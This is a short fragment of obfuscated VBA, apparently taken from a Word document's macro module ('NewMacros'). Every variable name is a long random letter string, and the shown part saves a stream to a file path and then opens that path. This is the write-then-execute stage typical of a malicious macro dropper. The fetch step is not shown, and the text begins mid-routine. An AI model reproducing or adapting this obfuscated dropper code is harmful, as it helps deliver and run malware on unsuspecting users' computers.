QUPFDDCEWTWMZSZCEZMBPIGZKFBINEEXQFPVDTDVXKFDZJITEQTRXYGRRWCYNVFOYVQGKLKMFCFUBBIKMIUCXQHISHJQUGMGYMXXLCLEGSGLIRQCMYUSYHOYTXJHVWNWZEYOSTSUGKNDJJQSTPCKGYPQBPRXWNUHHUYFTDSFOBOTQZRDUZDBHPW.SaveToFile YEPGUDSVGKEURSRTMJMCPIPRSOBPFXUPZUQWCTTNGTFLSJRLNZTSPYXJTGJHMOVGHMQODLUEOLGVZBZCURUKQQXZBWJRNFWXIVYFKUCVOCNMBRZTVIVBXHGQCOKIOWEOINYWLMDMPTOEIIIKVYDSYXGIJFRZVNFGQEHNMDKWWKOUJSIUDQEJGPHSKPSQWFM, DVXKFDZJITEQTRXYGRRWCYNVFOYVQGKLKMFCFUBBIKMIUCXQHISHJQUGMGYMXXLCLEGSGLIRQCMYUSYHOYTXJHVWNWZEYOSTSUGKNDJJQSTPCKGYPQBPRXWNUHHUYFTDSFOBOTQZRDUZDBHPWBBGRPEFVYIMHWUUTVOSVERQYTVRESHGXRCWSZFVVPPDHNCL + DVXKFDZJITEQTRXYGRRWCYNVFOYVQGKLKMFCFUBBIKMIUCXQHISHJQUGMGYMXXLCLEGSGLIRQCMYUSYHOYTXJHVWNWZEYOSTSUGKNDJJQSTPCKGYPQBPRXWNUHHUYFTDSFOBOTQZRDUZDBHPWBBGRPEFVYIMHWUUTVOSVERQYTVRESHGXRCWSZFVVPPDHNCL
QUPFDDCEWTWMZSZCEZMBPIGZKFBINEEXQFPVDTDVXKFDZJITEQTRXYGRRWCYNVFOYVQGKLKMFCFUBBIKMIUCXQHISHJQUGMGYMXXLCLEGSGLIRQCMYUSYHOYTXJHVWNWZEYOSTSUGKNDJJQSTPCKGYPQBPRXWNUHHUYFTDSFOBOTQZRDUZDBHPW.Close
End If
CXCQXWFHIEQXUMDFODFMRCJCVJUTIYHZCPCIFOMXJURPUELVPUGDSTJTVZUKPPORDGKYFFNPQMYGDULMWLNUSKQEERVCPZPCKXKQNWNYRWZXDLTWXCOLBBRUEIDSQQQSLORZNNVQRNZOEDTOYTOVBSSMMZEKXIXJSYSROXVHYFHGLTUFGKWNCJZDMQLBYY.Open (YEPGUDSVGKEURSRTMJMCPIPRSOBPFXUPZUQWCTTNGTFLSJRLNZTSPYXJTGJHMOVGHMQODLUEOLGVZBZCURUKQQXZBWJRNFWXIVYFKUCVOCNMBRZTVIVBXHGQCOKIOWEOINYWLMDMPTOEIIIKVYDSYXGIJFRZVNFGQEHNMDKWWKOUJSIUDQEJGPHSKPSQWFM)



End Sub

Attribute VB_Name = "NewMacros"
Sub macro()
'
' macro Macro
'
'

End Sub